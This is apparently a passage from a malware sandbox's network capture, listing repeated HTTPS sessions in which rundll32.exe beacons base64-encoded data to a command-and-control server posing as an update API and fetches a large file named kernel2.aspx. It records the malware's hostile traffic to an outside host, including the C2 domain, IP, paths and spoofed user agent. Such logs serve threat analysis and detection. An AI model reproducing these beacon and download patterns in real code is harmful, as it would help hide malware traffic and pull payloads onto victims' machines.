                        2025-01-16 05:02:06 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:07 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:06 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:07 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        7 | 192.168.2.6 | 49734 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:02:07 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:07 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:08 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:08 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:08 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        8 | 192.168.2.6 | 49733 | 94.159.113.213 | 443 | 7036 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:02:08 UTC81OUTGET /kernel2.aspx HTTP/1.1
                        Host: corepatchcraft.com
                        Cache-Control: no-cache
                        2025-01-16 05:02:08 UTC252INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:08 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        Last-Modified: Fri, 10 Jan 2025 13:04:21 GMT
                        ETag: "d0d40-62b59bbb4c5fe"
                        Accept-Ranges: bytes
                        Content-Length: 855360
                        Connection: close


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        9 | 192.168.2.6 | 49746 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:02:09 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:09 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:09 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:09 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:09 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        10 | 192.168.2.6 | 49754 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:02:10 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:10 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:11 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:10 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:11 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        11 | 192.168.2.6 | 49767 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:02:11 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:11 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:12 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:12 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:12 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        12 | 192.168.2.6 | 49777 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:02:13 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:13 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:13 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:13 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:13 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        13 | 192.168.2.6 | 49784 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:02:14 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:14 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:15 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:14 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:15 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        14 | 192.168.2.6 | 49794 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:02:15 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:15 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:16 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:16 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:16 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        15 | 192.168.2.6 | 60839 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:02:17 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:17 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:17 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:17 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:17 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        16 | 192.168.2.6 | 60848 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:02:18 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:18 UTC | 249 | OUT
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:19 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:18 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:19 UTC | 20 | IN
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        17 | 192.168.2.6 | 60854 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:02:19 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:19 UTC | 249 | OUT
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:20 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:20 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:20 UTC | 20 | IN
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        18 | 192.168.2.6 | 60864 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:02:21 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:21 UTC | 249 | OUT
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:21 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:21 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:21 UTC | 20 | IN
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
